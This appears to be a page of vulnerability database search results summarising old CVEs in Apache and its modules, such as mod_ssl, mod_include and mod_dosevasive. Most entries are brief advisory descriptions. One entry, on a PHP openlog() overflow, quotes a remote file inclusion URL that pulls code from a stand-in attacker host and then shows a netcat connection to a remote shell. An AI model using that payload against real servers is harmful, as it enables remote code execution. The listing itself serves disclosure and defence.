8064 matches found
CVE-2004-1405
Affected software: MediaWiki 1.3.8 and earlier (with Apache mod_mime); also referenced as vulnerable in MediaWiki
CVE-2004-1387
The CVE-2004-1387 entry concerns the apache-utils package, specifically the check_forensic script (version 1.3.31). The vulnerability allows a local user to overwrite or create arbitrary files via a symlink attack on temporary files, with the underlying root cause being improper handling of tempo...
CVE-2005-0182
The vulnerability CVE-2005-0182 affects the mod_dosevasive Apache module, versions 1.9 and earlier. The issue arises because the module creates temporary files with predictable filenames, which could enable remote attackers to overwrite arbitrary files via a symlink attack. This could impact inte...
CVE-2003-1054
mod_access_referer 1.0.2 allows remote attackers to cause a denial of service (crash) via a malformed Referer header that is missing a hostname, as parsed by the ap_parse_uri_components function in Apache, which triggers a null dereference...
CVE-2003-1054
CVE-2003-1054 affects the Apache mod_access_referer module (version 1.0.2). A malformed Referer header missing a hostname can cause the ap_parse_uri_components function to trigger a NULL pointer dereference, resulting in denial of service (crash). The OpenVAS and NVD records corroborate the NULL-...
CVE-2005-0108
CVE-2005-0108 is a vulnerability in Apache mod_auth_radius and the libpam-radius-auth PAM module. The Debian and related advisories describe an integer underflow in the mod_auth_radius component that can be triggered by a crafted RADIUS_REPLY_MESSAGE, potentially allowing remote attackers to caus...
PHP 4.3.7 - 'openlog()' Remote Buffer Overflow
http://www.vulnerable.box/remincl.php?page=http://3v1l.h4x0r.b0x/tooopenlog.php.txt BOOM.... netcat www.vulnerable.box 65535 Microsoft Windows 2000 versie 5.00.2195 (C) Copyright 1985-2000 Microsoft Corp. C:\Program Files\Apache Group\Apache2 --- Getting a shell is better than parsing commands to t...
mod_ssl SSLCipherSuite bypass
The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration...
CVE-2004-1083
Apache for Apple Mac OS X 10.2.8 and 10.3.6 restricts access to files in a case sensitive manner, but the Apple HFS+ filesystem accesses files in a case insensitive manner, which allows remote attackers to read .DS_Store files and files beginning with ".ht" using alternate capitalization...
CVE-2004-1084
Apache for Apple Mac OS X 10.2.8 and 10.3.6 allows remote attackers to read files and resource fork content via HTTP requests to certain special file names related to multiple data streams in HFS+, which bypass Apache file handles...
security flaw
mod_disk_cache in Apache 2.0 through 2.0.49 stores client headers, including authentication information, on the hard disk, which could allow local users to gain sensitive information...
CVE-2004-0942
CVE-2004-0942 affects Apache 2.0.52 and earlier. A remote attacker can trigger a denial of service by sending an HTTP GET with a MIME header containing many lines of whitespace, causing CPU/memory consumption. Public references show patches and advisories across platforms (e.g., ALT Linux package...
CVE-2004-0940
CVE-2004-0940 is a confirmed vulnerability: a buffer overflow in mod_include.get_tag() affects Apache 1.3.x up to 1.3.32, allowing local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error. The impact is ...
Apache mod_include get_tag() Function Local Overflow
The remote web server appears to be running a version of Apache that is older than version 1.3.33. This version is vulnerable to a local buffer overflow in the get_tag function of the module 'mod_include' when a specially crafted document with malformed server-side includes is requested through an...
CVE-2004-0747
Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables...
CVE-2004-0748
mod_ssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (CPU consumption) by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop...
DEBIAN-CVE-2004-0748
mod_ssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (CPU consumption) by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop...
CVE-2004-0786
The IPv6 URI parsing routines in the apr-util library for Apache 2.0.50 and earlier allow remote attackers to cause a denial of service (child process crash) via a certain URI, as demonstrated using the Codenomicon HTTP Test Tool...
CVE-2004-0885
The CVE-2004-0885 entry describes a vulnerability in Apache's mod_ssl for versions 2.0.35–2.0.52 where, when using SSLCipherSuite in directory or location context, remote clients can bypass intended restrictions by selecting any cipher suite allowed by the virtual host configuration. The initial ...